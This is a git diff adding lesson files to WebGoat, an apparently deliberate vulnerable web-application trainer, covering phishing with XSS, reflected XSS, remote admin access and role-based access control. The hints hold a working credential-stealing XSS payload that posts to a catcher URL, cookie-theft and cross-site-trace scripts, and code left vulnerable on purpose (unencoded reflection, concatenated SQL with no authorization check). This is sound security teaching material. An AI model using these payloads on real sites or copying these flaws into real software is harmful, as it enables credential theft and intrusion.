+					 + "<LI>doucument.forms[0].user.value - will access the user field"
+					 + "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
+					 + "<LI>javascript string concatentation uses a \"+\" </UL>"
+					 + "<BR><BR>Solution for this hint():<BR><BR>"
+					 + "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+					 + "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; +  document.forms(0).pass.value); "
+					 + "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+					 + "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
+					 + "&lt;/script&gt;");
+		hints
+				.add("Complete solution for this lesson:<BR><BR>"
+					 + "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+					 + "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; +  document.forms(0).pass.value); "
+					 + "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+					 + "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
+					 + "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+					 + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;"
+					 + "<BR><BR>You may need to remove the '.' from the http://localhost./");
+		/**
+		 * password<script>function hack(){ alert("Had this been a real
+		 * attack... Your credentials were just stolen.\nUser Name = " +
+		 * document.forms(0).user.value + "\nPassword = " +
+		 * document.forms(0).pass.value); XSSImage=new Image;
+		 * XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value +
+		 * "&password=" + document.forms(0).pass.value + "";}</script><form><br>
+		 * <br>
+		 * <HR>
+		 * <H3>This feature requires account login:</H2>
+		 * <br>
+		 * <br>
+		 * Enter Username:<br>
+		 * <input type="text" id="user" name="user"><br>
+		 * Enter Password:<br>
+		 * <input type="password" name = "pass"><br>
+		 * <input type="submit" name="login" value="login" onclick="hack()"></form><br>
+		 * <br>
+		 * <HR>
+		 * <!--
+		 * 
+		 */
+		return hints;
+	}
+
+	/**
+	 * Gets the instructions attribute of the XssSearch object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions =
+				"This lesson is an example of how a website might support a phishing attack<BR><BR>"
+						+ "Below is an example of a standard search feature.<br>"
+						+ "Using XSS and HTML insertion, your goal is to: <UL>"
+						+ "<LI>Insert html to that requests credentials"
+						+ "<LI>Add javascript to actually collect the credentials"
+						+ "<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> "
+						+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
+
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(30);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the category attribute of the FailOpenAuthentication object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.XSS;
+	}
+
+	/**
+	 * Gets the title attribute of the CluesScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Phishing with XSS");
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RandomLessonAdapter.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RandomLessonAdapter.java
new file mode 100755
index 000000000..402757a83
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RandomLessonAdapter.java
@@ -0,0 +1,57 @@
+package org.owasp.webgoat.lessons;
+
+import org.owasp.webgoat.session.LessonTracker;
+import org.owasp.webgoat.session.RandomLessonTracker;
+import org.owasp.webgoat.session.WebSession;
+
+public abstract class RandomLessonAdapter extends LessonAdapter {
+
+	public abstract String[] getStages();
+	
+	public void setStage(WebSession s, String stage) {
+		getLessonTracker(s).setStage(stage);
+	}
+	
+	public String getStage(WebSession s) {
+		return getLessonTracker(s).getStage();
+	}
+	
+	public void setStageComplete(WebSession s, String stage) {
+		RandomLessonTracker lt = getLessonTracker(s);
+		lt.setStageComplete(stage, true);
+		if (lt.getCompleted()) {
+			s.setMessage("Congratulations, you have completed this lab");
+		} else {
+			s.setMessage("You have completed " + stage + ".");
+			if (! stage.equals(lt.getStage()))
+				s.setMessage(" Welcome to " + lt.getStage());
+		}
+	}
+	
+	public boolean isStageComplete(WebSession s, String stage) {
+		return getLessonTracker(s).hasCompleted(stage);
+	}
+	
+	@Override
+    public RandomLessonTracker getLessonTracker(WebSession s) {
+    	return (RandomLessonTracker) super.getLessonTracker(s);
+    }
+
+
+	@Override
+	public RandomLessonTracker getLessonTracker(WebSession s, AbstractLesson lesson) {
+		return (RandomLessonTracker) super.getLessonTracker(s, lesson);
+	}
+
+
+	@Override
+	public RandomLessonTracker getLessonTracker(WebSession s, String userNameOverride) {
+		return (RandomLessonTracker) super.getLessonTracker(s, userNameOverride);
+	}
+
+	@Override
+	public LessonTracker createLessonTracker() {
+		return new RandomLessonTracker(getStages());
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ReflectedXSS.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ReflectedXSS.java
new file mode 100644
index 000000000..15523c047
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ReflectedXSS.java
@@ -0,0 +1,294 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.regex.Pattern;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.HtmlEncoder;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 28, 2003
+ */
+
+public class ReflectedXSS extends LessonAdapter
+{
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+
+    protected Element createContent(WebSession s)
+    {
+
+	ElementContainer ec = new ElementContainer();
+	String regex1 = "^[0-9]{3}$";// any three digits
+	Pattern pattern1 = Pattern.compile(regex1);
+
+	try
+	{
+	    String param1 = s.getParser().getRawParameter("field1", "111");
+	    String param2 = HtmlEncoder.encode(s.getParser().getRawParameter(
+		    "field2", "4128 3214 0002 1999"));
+	    float quantity = 1.0f;
+	    float total = 0.0f;
+	    float runningTotal = 0.0f;
+
+	    // test input field1
+	    if (!pattern1.matcher(param1).matches())
+	    {
+		if (param1.toLowerCase().indexOf("script") != -1)
+		{
+		    makeSuccess(s);
+		}
+
+		s
+			.setMessage("Whoops! You entered "
+				+ param1
+				+ " instead of your three digit code.  Please try again.");
+	    }
+
+	    // FIXME: encode output of field2, then s.setMessage( field2 );
+
+	    ec.addElement(new HR().setWidth("90%"));
+	    ec.addElement(new Center().addElement(new H1()
+		    .addElement("Shopping Cart ")));
+	    Table t = new Table().setCellSpacing(0).setCellPadding(2)
+		    .setBorder(1).setWidth("90%").setAlign("center");
+
+	    if (s.isColor())
+	    {
+		t.setBorder(1);
+	    }
+
+	    TR tr = new TR();
+	    tr.addElement(new TH().addElement(
+		    "Shopping Cart Items -- To Buy Now").setWidth("80%"));
+	    tr.addElement(new TH().addElement("Price").setWidth("10%"));
+	    tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+	    tr.addElement(new TH().addElement("Total").setWidth("7%"));
+	    t.addElement(tr);
+
+	    tr = new TR();
+	    tr
+		    .addElement(new TD()
+			    .addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
+	    tr.addElement(new TD().addElement("69.99").setAlign("right"));
+	    tr.addElement(new TD().addElement(
+		    new Input(Input.TEXT, "QTY1", s.getParser()
+			    .getStringParameter("QTY1", "1")))
+		    .setAlign("right"));
+	    quantity = s.getParser().getFloatParameter("QTY1", 0.0f);
+	    total = quantity * 69.99f;
+	    runningTotal += total;
+	    tr.addElement(new TD().addElement("$" + total));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr.addElement(new TD()
+		    .addElement("Dynex - Traditional Notebook Case"));
+	    tr.addElement(new TD().addElement("27.99").setAlign("right"));
+	    tr.addElement(new TD().addElement(
+		    new Input(Input.TEXT, "QTY2", s.getParser()
+			    .getStringParameter("QTY2", "1")))
+		    .setAlign("right"));
+	    quantity = s.getParser().getFloatParameter("QTY2", 0.0f);
+	    total = quantity * 27.99f;
+	    runningTotal += total;
+	    tr.addElement(new TD().addElement("$" + total));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr
+		    .addElement(new TD()
+			    .addElement("Hewlett-Packard - Pavilion Notebook with Intel Centrino"));
+	    tr.addElement(new TD().addElement("1599.99").setAlign("right"));
+	    tr.addElement(new TD().addElement(
+		    new Input(Input.TEXT, "QTY3", s.getParser()
+			    .getStringParameter("QTY3", "1")))
+		    .setAlign("right"));
+	    quantity = s.getParser().getFloatParameter("QTY3", 0.0f);
+	    total = quantity * 1599.99f;
+	    runningTotal += total;
+	    tr.addElement(new TD().addElement("$" + total));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr
+		    .addElement(new TD()
+			    .addElement("3 - Year Performance Service Plan $1000 and Over "));
+	    tr.addElement(new TD().addElement("299.99").setAlign("right"));
+
+	    tr.addElement(new TD().addElement(
+		    new Input(Input.TEXT, "QTY4", s.getParser()
+			    .getStringParameter("QTY4", "1")))
+		    .setAlign("right"));
+	    quantity = s.getParser().getFloatParameter("QTY4", 0.0f);
+	    total = quantity * 299.99f;
+	    runningTotal += total;
+	    tr.addElement(new TD().addElement("$" + total));
+	    t.addElement(tr);
+
+	    ec.addElement(t);
+
+	    t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
+		    .setWidth("90%").setAlign("center");
+
+	    if (s.isColor())
+	    {
+		t.setBorder(1);
+	    }
+
+	    ec.addElement(new BR());
+
+	    tr = new TR();
+	    tr.addElement(new TD()
+		    .addElement("The total charged to your credit card:"));
+	    tr.addElement(new TD().addElement("$" + runningTotal));
+	    tr.addElement(new TD().addElement(ECSFactory
+		    .makeButton("Update Cart")));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr
+		    .addElement(new TD()
+			    .addElement("Enter your credit card number:"));
+	    tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2",
+		    param2)));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr.addElement(new TD()
+		    .addElement("Enter your three digit access code:"));
+	    tr.addElement(new TD().addElement("<input name='field1' type='TEXT' value='" + param1 + "'>"));
+	    //tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1)));
+	    t.addElement(tr);
+
+	    Element b = ECSFactory.makeButton("Purchase");
+	    tr = new TR();
+	    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign(
+		    "center"));
+	    t.addElement(tr);
+
+	    ec.addElement(t);
+	    ec.addElement(new BR());
+	    ec.addElement(new HR().setWidth("90%"));
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+	return (ec);
+    }
+
+
+    /**
+     *  DOCUMENT ME!
+     *
+     * @return    DOCUMENT ME!
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.XSS;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the AccessControlScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("A simple script is &lt;SCRIPT&gt;alert('bang!');&lt;/SCRIPT&gt;.");
+	hints.add("Can you get the script to disclose the JSESSIONID cookie?");
+	hints
+		.add("You can use &lt;SCRIPT&gt;alert(document.cookie);&lt;/SCRIPT&gt; to access the session id cookie");
+	hints
+		.add("Can you get the script to access the credit card form field?");
+	hints
+		.add("Try a cross site trace (XST) Command:<br>"
+			+ "&lt;script type=\"text/javascript\"&gt;if ( navigator.appName.indexOf(\"Microsoft\") !=-1)"
+			+ " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\", \"./\", false);"
+			+ " xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf(\"\\n\") > -1) str1 = str1.replace(\"\\n\",\"&lt;br&gt;\"); "
+			+ "document.write(str1);}&lt;/script&gt;");
+	return hints;
+    }
+
+
+    //	<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText;document.write(str1);}</script>
+    /**
+     *  Gets the instructions attribute of the WeakAccessControl object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script and do something bad.";
+	return (instructions);
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(120);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the AccessControlScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return "Reflected XSS Attacks";
+    }
+    
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java
new file mode 100644
index 000000000..2d673d925
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java
@@ -0,0 +1,115 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 28, 2003
+ */
+public class RemoteAdminFlaw extends LessonAdapter
+{
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+		ElementContainer ec = new ElementContainer();
+	
+		if (s.completedHackableAdmin())
+		{
+		    makeSuccess(s);
+		}
+		else
+		{
+		    ec.addElement("WebGoat has an admin interface.  To 'complete' this lesson you must figure "
+				    + "out how to access the administrative interface for WebGoat.");
+		}
+		return ec;
+
+    }
+
+
+    /**
+     *  Gets the category attribute of the ForgotPassword object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+    	return Category.ACCESS_CONTROL;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the HelloScreen object
+     *
+     * @return    The hints value
+     */
+    public List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("WebGoat has 2 admin interfaces.");
+	hints.add("WebGoat has one admin interface that is controlled via a URL parameter and is 'hackable'");
+	hints.add("WebGoat has one admin interface that is controlled via server side security constraints and should not be 'hackable'");
+	hints.add("Follow the Source!");
+
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(160);
+
+
+    protected Integer getDefaultRanking()
+    {
+    	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the HelloScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+    	return ("Remote Admin Access");
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
new file mode 100644
index 000000000..0a21282c1
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
@@ -0,0 +1,179 @@
+package org.owasp.webgoat.lessons.RoleBasedAccessControl;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class DeleteProfile extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+
+    public DeleteProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName, LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException,
+	    ValidationException
+    {
+	getLesson().setCurrentAction(s, getActionName());
+
+	int userId = getIntSessionAttribute(s, getLessonName() + "."
+		+ RoleBasedAccessControl.USER_ID);
+	int employeeId = s.getParser().getIntParameter(
+		RoleBasedAccessControl.EMPLOYEE_ID);
+
+	if (isAuthenticated(s))
+	{
+	    deleteEmployeeProfile(s, userId, employeeId);
+
+	    try
+	    {
+		chainedAction.handleRequest(s);
+	    }
+	    catch (UnauthenticatedException ue1)
+	    {
+		System.out.println("Internal server error");
+		ue1.printStackTrace();
+	    }
+	    catch (UnauthorizedException ue2)
+	    {
+		System.out.println("Internal server error");
+		ue2.printStackTrace();
+	    }
+	}
+	else
+	    throw new UnauthenticatedException();
+
+	updateLessonStatus(s);
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	return RoleBasedAccessControl.LISTSTAFF_ACTION;
+    }
+
+
+    public void deleteEmployeeProfile(WebSession s, int userId, int employeeId)
+	    throws UnauthorizedException
+    {
+	try
+	{
+	    // Note: The password field is ONLY set by ChangePassword
+	    String query = "DELETE FROM employee WHERE userid = " + employeeId;
+	    //System.out.println("Query:  " + query);
+	    try
+	    {
+		Statement statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		statement.executeUpdate(query);
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error deleting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error deleting employee profile");
+	    e.printStackTrace();
+	}
+    }
+
+
+    public void deleteEmployeeProfile_BACKUP(WebSession s, int userId,
+	    int employeeId) throws UnauthorizedException
+    {
+	try
+	{
+	    // Note: The password field is ONLY set by ChangePassword
+	    String query = "DELETE FROM employee WHERE userid = " + employeeId;
+	    //System.out.println("Query:  " + query);
+	    try
+	    {
+		Statement statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		statement.executeUpdate(query);
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error deleting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error deleting employee profile");
+	    e.printStackTrace();
+	}
+    }
+
+
+    private void updateLessonStatus(WebSession s)
+    {
+	// If the logged in user is not authorized to be here, stage 1 is complete.
+	if (RoleBasedAccessControl.STAGE1.equals(getStage(s))) 
+	try
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + RoleBasedAccessControl.USER_ID);
+
+	    if (!isAuthorized(s, userId,
+		    RoleBasedAccessControl.DELETEPROFILE_ACTION))
+	    {
+		setStageComplete(s, RoleBasedAccessControl.STAGE1);
+	    }
+	}
+	catch (ParameterNotFoundException e)
+	{}
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java
new file mode 100644
index 000000000..544e1786f
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java
@@ -0,0 +1,198 @@
+package org.owasp.webgoat.lessons.RoleBasedAccessControl;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class EditProfile extends DefaultLessonAction
+{
+
+    public EditProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName)
+    {
+	super(lesson, lessonName, actionName);
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException
+    {
+	getLesson().setCurrentAction(s, getActionName());
+
+	if (isAuthenticated(s))
+	{
+	    int userId = getUserId(s);
+	    int employeeId = s.getParser().getIntParameter(
+		    RoleBasedAccessControl.EMPLOYEE_ID);
+
+	    Employee employee = getEmployeeProfile(s, userId, employeeId);
+	    setSessionAttribute(s, getLessonName() + "."
+		    + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY, employee);
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	return RoleBasedAccessControl.EDITPROFILE_ACTION;
+    }
+
+
+    public Employee getEmployeeProfile(WebSession s, int userId,
+	    int subjectUserId) throws UnauthorizedException
+    {
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = ?";
+
+	    try
+	    {
+		PreparedStatement answer_statement = WebSession
+			.getConnection(s).prepareStatement(query,
+				ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		answer_statement.setInt(1, subjectUserId);
+		ResultSet answer_results = answer_statement.executeQuery();
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+
+    public Employee getEmployeeProfile_BACKUP(WebSession s, int userId,
+	    int subjectUserId) throws UnauthorizedException
+    {
+	// Query the database to determine if this employee has access to this function
+	// Query the database for the profile data of the given employee if "owned" by the given user
+
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = ?";
+
+	    try
+	    {
+		PreparedStatement answer_statement = WebSession
+			.getConnection(s).prepareStatement(query,
+				ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		answer_statement.setInt(1, subjectUserId);
+		ResultSet answer_results = answer_statement.executeQuery();
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+}
